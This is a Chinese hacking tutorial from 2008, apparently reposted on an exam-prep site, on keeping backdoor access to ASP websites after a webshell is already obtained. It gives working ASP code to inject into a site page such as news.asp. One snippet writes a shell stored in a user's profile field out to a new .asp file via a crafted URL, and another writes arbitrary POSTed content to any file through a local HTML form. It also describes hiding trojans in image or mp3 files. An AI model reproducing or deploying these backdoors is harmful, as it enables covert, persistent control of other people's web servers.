巧妙利用.mdb后缀数据库做后门

文章作者 100test 发表时间 2008:01:11 13:15:14
来源 100Test.Com百考试题网


  我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦 写到mp3文件里写到doc文件里都是可以的啦
copy 文件名/参数 文件名/参数 生成文件名
  这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀.mdb的数据库中,前提是在我们拿到

  一个webshell之后...

  我们所知道的,很多站点在用户注册的时候要让填好多东西例如:
  用户名、密码、QQ、邮箱、个人简介、电话、联系方式、住址一类的
  而对应到数据库中也都会有相应的表 字段 值
  我今天要做的就是 我注册一个用户在 我的个人简介的地方上写入shell代码,然后修改他站点上的一个文件,使用的时候触发这个文件,就把我个人简历中的shell代码,备份到当前目录下
<%
if request("action")="firefox" then
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
set rs=server.createobject("ADODB.recordset")
sql="0select "&. bname &. " from "&.tname&. " where "&.id&."="&.idvalue&.""""
rs.open sql,conn,1,3
if not rs.eof then
content=rs(bname)
else
response.write "Nothing"
end if
set fso=Server.CreateObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(content)
txtfile.close
end if
%>

将上边的代码加到站点的一个文件中 如news.asp

根据我们了解的信息 在其站点注册后 下载数据库看结构

我注册的firefox名字是在 user表 其id值为119 用于存放我注册简历的表字段为jl

那么在使用的时候我们

news.asp?action=firefox&.fn=firefox.asp&.tn=user&.bn=jl&.id=id&.idv=119

就可以在news.asp相同目录下写入一个名为 firefox.asp的webshell

以上可以说是万千隐藏方法中的一种 下边再说另外一种更方便的隐藏方法

这个方法就和mdb后缀无关系了

同样我们还是修改news.asp 将以下代码插入到对方news.asp中

<%
if request("action")="firefox" then
n=request.form("n")
c=request.form("c")
set fso=Server.CreateObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
end if
%><

这段代码相对简单些 算是一个木马的服务端吧

使用的时候以这段代码配合



F.s.t火狐技术联盟[www.wrsky.com]



Name:name=n width="32">

Shell:

将以上代码中的

http://localhost/config.asp?action=firefox

替换成你的服务端地址
然后保存为本地的.htm文件,本地打开后定义要生成的文件名 文件内容 远程提交 ok 又是一种留后门的方法



相关文章


WindowsXP文件关联修复编辑利器
讲解XP系统中十个特殊的文件_文件夹
打破无聊难学另类五笔学习方法
关于winlogon进程中保存的当前用户的密码的问题
巧妙利用.mdb后缀数据库做后门
网络时代黑客攻击的主要方式及防范手段
内网渗透如何打开突破口
澳大利亚华人论坛
考好网
日本华人论坛
华人移民留学论坛
英国华人论坛